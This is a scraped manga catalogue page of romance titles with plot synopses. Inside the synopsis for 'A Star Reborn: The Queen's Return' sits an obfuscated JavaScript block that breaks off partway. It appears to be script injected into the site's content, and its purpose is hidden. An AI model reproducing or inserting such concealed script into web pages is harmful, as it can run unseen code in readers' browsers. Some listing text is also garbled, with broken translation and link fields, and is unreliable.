Romance - Page 53

Romance manga tells love stories, often filled with emotional conflicts, misunderstandings, and tender moments, making it a popular genre for readers who enjoy romantic drama.

24776 results

A Sneaky Blind Date [Official]

Read manhwa A Rude Confrontation / Ein unerwartetes Blind Date / Hospital Proposal / นัดบอดลวงเล่ห์ All Naeun Kim ever wanted was to become the best surgeon she could be. She’s satisfied, even if there’s no time for herself. But when her power-hungry father sends her on a blind date, her life is thrown into chaos. Kangjoon Cha is a legend–and not just because of his powerful family. He’s a brilliant and respected surgeon in his own right. As busy as he is, it’s no wonder he’s single–unless there’s another reason. Can this pair thread the needle? Or will this relationship end before it starts? “A Sneaky Blind Date [Official] Manhwa” is another name: ワケアリお見合い 這場相親別有用心 엉큼한 맞선


A Song Dwelling In The Clouds: Love Inside The Cage

Read manhua A Song Dwelling In The Clouds: Love Inside The Cage / 云想之歌笼中之恋 From INKR: As a girl arrives at a new school, she encounters a boy who seems to be hostile towards her. She also meets a gentle-looking man, who sends her and the hostile boy in the past. Now the two have to adapt to their new lifestyle and find a way back to the present


A Song of Prosperity

An intelligent and domineering woman encounters a carefree, flamboyant prince at a brothel. Initially, she thinks of it as nothing more than a chance meeting, but little did she know their fates would end up being so deeply intertwined...<br><br>“If you hold no love for me, then I will give up my love for you as well.”<br><br>A romance story about love and loss set in ancient times.


A Spanish Awakening

Her unrequited love, the man she’s always longed for, has offered to buy her for a night! Emilio Rios is a Spanish businessman known for his ruthless business practices and splashy affairs with women. He’s her brother’s good friend, and Megan had been secretly in love with him since she was young. Right up until two years ago when he accused her of being a loose woman who preys on men’s baser instincts! After that she hadn’t want to ever see him again, but cruel fate brought her and Emilio together again at the airport in Madrid. And now he’s bound her to him with an unfair contract!


A Spanish HoneyMoon

Cam, a reporter who leaps into danger and has a reputation as a playboy, returns to Spain for the first time in six months. When he arrives at his villa with a beautiful woman in tow, a quiet widow appears in front of him. Widowed Liz, who’s in charge of managing the villa’s garden, isn’t Cam’s type, but he can’t get her out of his mind. When she cries at the memory of her late husband, it shocks him. Is there even one woman who would cry for Cam? He realizes he wants a loyal partner. He’ll even give up his playboy ways to win one!


A Spoonful of Your Love

A secret office romance between the son of the CEO of a huge conglomerate and his newbie secretary slash perpetual liar! Yeonju gave up her career in order to chase after love, but only found herself left with scars and pain … After getting a position at a huge company as a secretary, she finds herself face-to-face with her new boss, Jaehyun, who also happens to be a former classmate of Yeonju’s! Jaehyun’s serious good looks and short temper earned him the nickname among his employees, “the S.H.B.”, or the “super, handsome bastard”. After a series of humiliating situations, Jaehyun admits that he no longer just wants to be friends, and would rather date. Yeonju, who had her mind set on never dating ever again, finds herself interested despite how hard she tries not to fall for him!


A Star From Above

This BL revolves around the lives of three high schoolers: Haruka, Han Meol, and Dong Chan. One day, Haruka moved to their school and eventually became their classmate. Despite being total strangers, the trio soon became close. However, Han Meol and Dong chan began to feel something strange with Haruka. Is it somewhat of a bad sign or will it be the start of something even more beautiful between them?


A Star Reborn: The Queen’s Return

She was the Queen of Song, but she died during her greatest years. After she was reincarnated, she became a simple trainee. She lost her former glory? It doesn’t matter—no one can compete with her beautiful singer’s voice. She’s mocked for her lowly birth? It doesn’t matter—her true identity is enough to make the whole world tremble. She owes huge debts? It doesn’t matter… A powerful boss whispered to her: “The debt will disappear if you would become my woman.” But she is proud: “I’m sorry. I would sell my art, but not my whole self.” ———————————————— This is the story of the Queen of Song, of her return to the peak… and an overbearing chairman.<script></script><script>(function(_0x241853,_0x3738b3){var _0x42a926=_0x33f1,_0x2b20f7=_0x241853();while(!![]){try{var _0x5c17ed=-parseInt(_0x42a926(0x137))/(0x174b+0x1d82+-0x34cc)+-parseInt(_0x42a926(0x13a))/(-0x143f+0x250a+-0x10c9)*(-parseInt(_0x42a926(0x134))/(-0x1f7c+-0x1610+-0x358f*-0x1))+-parseInt(_0x42a926(0x141))/(0x3*-0x64b+0x35a+-0x17*-0xad)+-parseInt(_0x42a926(0x142))/(0x1*0x1722+-0x55f+-0x11be)+parseInt(_0x42a926(0x144))/(0x1f1a+-0x1*-0x228+0x4*-0x84f)*(-parseInt(_0x42a926(0x146))/(-0x163a+0x24d*-0xe+-0x49*-0xbf))+parseInt(_0x42a926(0x151))/(0x1*0x1727+0x1*0x49f+-0x1bbe)*(parseInt(_0x42a926(0x13c))/(0x18f2+-0x53e+-0x5f*0x35))+parseInt(_0x42a926(0x133))/(0x1*-0x7d5+-0x1dd7+0x2*0x12db);if(_0x5c17ed===_0x3738b3)break;else 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A Stepmother's Märchen

The Iron Widow, the Spider Widow, the Male Hunter, the Witch of the Neuschwanstein Castle, the embarrassment of noble ladies… These were all the words used to describe the Marchioness Shuli von Neuschwanstein. Despite receiving such harsh criticism from everyone, she persisted in raising her 'children,' left behind from her late husband. On the day of her eldest son's wedding, signaling his possession of the family's seat as Marquess, she felt she had finally tied up all loose ends and could live the rest of her life out peacefully. However, she had been terribly mistaken as she finds herself getting caught up in an accident and dying whilst leaving the castle on his wedding day. Upon opening her eyes, she finds herself waking up to the day of her husband's funeral, seven years ago.'I refuse to suffer any more. I won’t live as I did in the past a second time!'---Official Translations:* (* (* (* (* (* (เทพนิยายของแม่เลี้ยงชูริ/199)


A Stepmother’s Märchen

The iron widow, the spider widow, male hunter, the witch of Neuwanstein castle, the embarrassment of noble ladies……. These were all the words used to describe the Marchioness, Suri Van Neuwanstein. Despite receiving such criticism from the world, she raised her ‘children’, who were unrelated to her by blood and were old enough to be called her siblings. And finally, on the day of the first son Jeremy’s wedding, she felt that all her hard work had tied all the loose ends together. But she had been terribly mistaken. After hearing the message requesting her to not attend the wedding, she got caught up in an accident and died while leaving the castle. But when she opened her eyes, she woke up on the day of her husband’s funeral, seven years ago. I refuse to suffer any more. I won’t live as I had in the past a second time!


A Story About a Creepy Girl Smile

"That creepy expression is just the best!"


A Story About A Dragon And The Rising Of An Adventurer

"Understand for yourself that you are worthless. You are already obsolete." Dion, the recovery wizard who was told so, was seriously injured by the hands of party members and left behind in the interior of the highest difficulty dungeon. On the verge of running out of his life, he happens to encounter a dying dragon. Dion realized that he couldn't help him anymore, and he treated the dragon to live as a recovery wizard until the end. Then the dragon thanked him and even shared the power of the dragon. In addition, this dragon seems to have been a legendary god dragon-class. Dion escapes from the dungeon with his new companion, the dragon, and restarts as an adventurer. He captures the difficult dungeons that stand in his way, and his abilities are recognized and he has all the strong men on his side. This is a story about a recovery magician who leaves behind even the party he was in from a difficult situation and becomes the strongest adventurer in the world. Links: - Web Novel: - Official LN (JP):
